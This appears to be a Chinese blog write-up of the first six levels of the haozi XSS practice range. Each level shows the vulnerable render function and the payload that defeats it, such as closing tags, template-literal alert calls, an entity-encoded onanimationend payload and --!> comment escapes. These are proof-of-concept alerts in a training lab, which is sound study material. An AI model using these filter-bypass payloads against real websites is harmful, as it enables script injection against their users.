耗子的XSS靶场wp

最新推荐文章于 2024-03-29 15:40:00 发布
最新推荐文章于 2024-03-29 15:40:00 发布
阅读量729 收藏 7
点赞数 2
分类专栏: CTF 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/119223058
版权

耗子的XSS靶场wp

靶场传送门

GitHub仓库传送门

0x00

非常简单的一关

function render (input) {
   
  return '<div>' + input + '</div>'
}

直接通关

<script>alert(1)</script>

0x01

这一关使用了textarea来将我们的输入转成文本

function render (input) {
   
  return '<textarea>' + input + '</textarea>'
}

这里我的思路是闭合textarea

</textarea><script>alert(1)</script>

0x02

第二关是闭合属性的

function render (input) {
   
  return '<input type="name" value="' + input + '">'
}

只需要简单闭合就🆗了

""<><script>alert(1)</script>

<input type="name" value=""><script>alert(1)</script>">

0x03

function render (input) {
   
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

可以看到过滤了[ ] ( ) 这几个符号,我一开始的思路是想到用编码方式绕过,经过学习发现这个想法是不能实现的。

第三关查阅了资料一次对浏览器解析和XSS的深度探究从中了解在原始文本元素(Raw textelements),<script><style>中是无法使用字符实体的。

要用到 ` 深入浅出ES6(四):模板字符串

<script>alert`1`</script>

0x04

function render (input) {
   
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

可以看到 ` 也被过滤掉了,那么思路回到编码绕过并根据上一关的学习,在

<script>中是无法使用编码字符实体的,所以需要借助属性值,因为属性值首先会被HTML解析 。那么思路明确后非常简单了,先去bp学院复制一个payload然后将过滤字符进行实体编码转换

<style>@keyframes x{
   }</style><img style="animation-name:x" onanimationend="alert&#40;1&#41;"></img>

0x05

这一关涉及到注释

function render (input) {
   
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

可以看到-->被替换成一个😂来避免注释。我试过通过闭合后面的,但是不成功

<script>alert(1)</script><!-- 

<!--<script>alert(1)</script><!-- -->

也就是说我们必须闭合前面的才能逃出注释,然后注释有2种

<!-- -->
<!-- --!>

所以答案很明显了

--!><script>alert(1)</script>

<-- --!><script>alert(1)
最低0.47元/天 解锁文章
小莫神和他的的
关注
专栏目录
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
2401_84297796的博客
04-26 749
作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」: 此文章已录入专栏。
xss_labs 漏洞平台靶场练习 总结 wp
Alexhirchi的博客
08-11 2888
每日学习 每日持续更新ing~ 文章目录xss漏洞什么是xssXSS分类构造xss思路靶场练习level1level2level3level4level5level6level7level8level9level10 xss漏洞 什么是xss xss(Cross Site Script),跨站脚本攻击 网页内嵌入HTML,CSS,JS代码 此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可以使用XSS来绕过访问控制,如同源策略。利用XSS可以窃取账号,网页挂马,发动拒绝服务攻击,发送垃圾邮件等.
XSS基础——耗子XSS靶场
最新发布
lizhiiiii的博客
03-29 458
这道题用了一个古英文字符 是小写s 转成大写就是S但是又不在过滤范围内 算是个小技巧 见过了就记住 字符:ſ
XSS靶场(haozi.me)
weixin_52240463的博客
08-15 986
一边看题解一边打了一个下午终于通关 小rookie一个比较菜 很多不会的地方查了很多资料 可能有部分思路和别的地方又雷同 各位姥爷看看就好 目录 0x00 送分题啥过滤没有​ 0x01​textarea 字面意思是文本域 类似text类型 不能触发xss 需要闭合 0x02 0x03 0x04​ 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 送分题啥过滤没有 0x01tex...
xss.haozi靶场通关
weixin_60719780的博客
01-06 392
做完xss-labs靶场后,再继续做这个靶场,感觉这个不是很难,毕竟在第一个靶场也获取了一些经验,但是这个靶场偏向技巧,所以还是以了解为主。
xss.haozi练习平台wp
mmzkyl的博客
03-28 267
xss.haozi练习平台wp
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
xss实战,xss靶场通关详解
maluxiao123的博客
04-02 2056
第一关:我们发现页面上没有任何可以输入的地方 但是发现url中有参数传递为test,而页面上也显示了test,所以说,传入的参数可以显示到页面上。 使用f12控制台查看原代码 我们传入<script></script> 这里可以发现,原本来的test不见了,按理来说应该会出现欢迎用户<script></script>才对,但是没有,到哪里去了,没错,他被浏览器解析了,在这个标签中就可以插入你想执行的js代码 我们由于靶场需要弹窗才能进入下一关,所以传入&
XSS靶场level15详细通关教程
m0_49434302的博客
07-07 1800
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15关的时候,怎么也无法通关。我这个朋友在15关卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
XSS弹窗专项练习
m0_53743276的博客
02-10 931
XSS练习
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 508
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...
XSS刷题之旅
Lethe's Blog
07-30 1622
0x01 一些资源或文章: XSS小结 那些年我们没能bypass的xss filter XSS Filter Evasion Cheat Sheet 中文版 XSS攻击手段&在CTF中的运用 0x02 常用Payload(慢慢积累…) <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss...
XSS 之 haozi me 题解——人生第一份CSDN题解
Mr_Fmnwon的博客
08-05 699
XSS 靶场xss.haozi.me 认真写的第一篇WP,以此总结,以此自勉
XSS的Waf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 5268
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
XSS.haozi.me刷题
quan9i的博客
07-10 280
文章同步于个人博客https://www.quan9i.top
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
XSS挑战赛
D.MIND 的博客
03-14 693
前言: 对于我这种XSS小白(不对,把"XSS"去掉)还是能学到不少基础知识的 Here We GO! 练习地址:https://xss.haozi.me/#/0x00 0x00 function render (input) { return '<div>' + input + '</div>' } 放在<div>中,直接就: <script>alert(/1/)</script> 0x01 function render (input
WEB安全学习[XSS漏洞]
CLANCY的博客
11-29 188
XSS漏洞: 原理: 简单点说就是允许不法用户将恶意代码插入网站代码中,通过其他用户执行恶意代码,来使其收到XSS攻击,导致其他用户的信息泄露或者其他严重后果 危害: 盗取用户账号 盗取/控制用户乃至企业的数据 非法进行转账 强制发送电子邮件(蠕虫病毒) 网站挂马 控制受害人机器向其他的网站发起攻击(该种受害人机器称为肉鸡) 类型: 反射型:需要用户自己点击才会执行,并不持久 存储型:存储到后端服务器中,实现持久化,例如一些留言,个人信息等可以和后台数据有交互的地方都有可能存在漏洞,此
centos7删除xss靶场
07-25
要删除CentOS 7上的XSS靶场,按照以下步骤进行操作: 1. 首先,登录到CentOS 7服务器。 2. 找到XSS靶场的安装目录。通常情况下,靶场的文件会存储在/var/www/html/或/opt目录下。你可以使用以下命令来查找: ``` sudo find / -name "xss靶场文件名" ``` 将 "xss靶场文件名" 替换为你实际安装的XSS靶场的文件名。 3. 找到XSS靶场的安装目录后,使用以下命令删除该目录及其内容: ``` sudo rm -rf /path/to/xss靶场目录 ``` 将 "/path/to/xss靶场目录" 替换为你实际的XSS靶场安装目录路径。 4. 删除XSS靶场的数据库(如果有)。如果XSS靶场使用了数据库来存储数据,你可能还需要删除相关的数据库。使用以下命令登录到数据库: ``` mysql -u 用户名 -p ``` 将 "用户名" 替换为你实际的数据库用户名。 5. 在数据库中删除相关的数据库。使用以下命令来列出所有的数据库: ``` SHOW DATABASES; ``` 找到与XSS靶场相关的数据库,并使用以下命令删除它: ``` DROP DATABASE 数据库名; ``` 将 "数据库名" 替换为你实际的数据库名。 完成以上步骤后,XSS靶场应该已经被成功删除。请确保在执行任何删除操作之前,备份重要数据,并谨慎操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值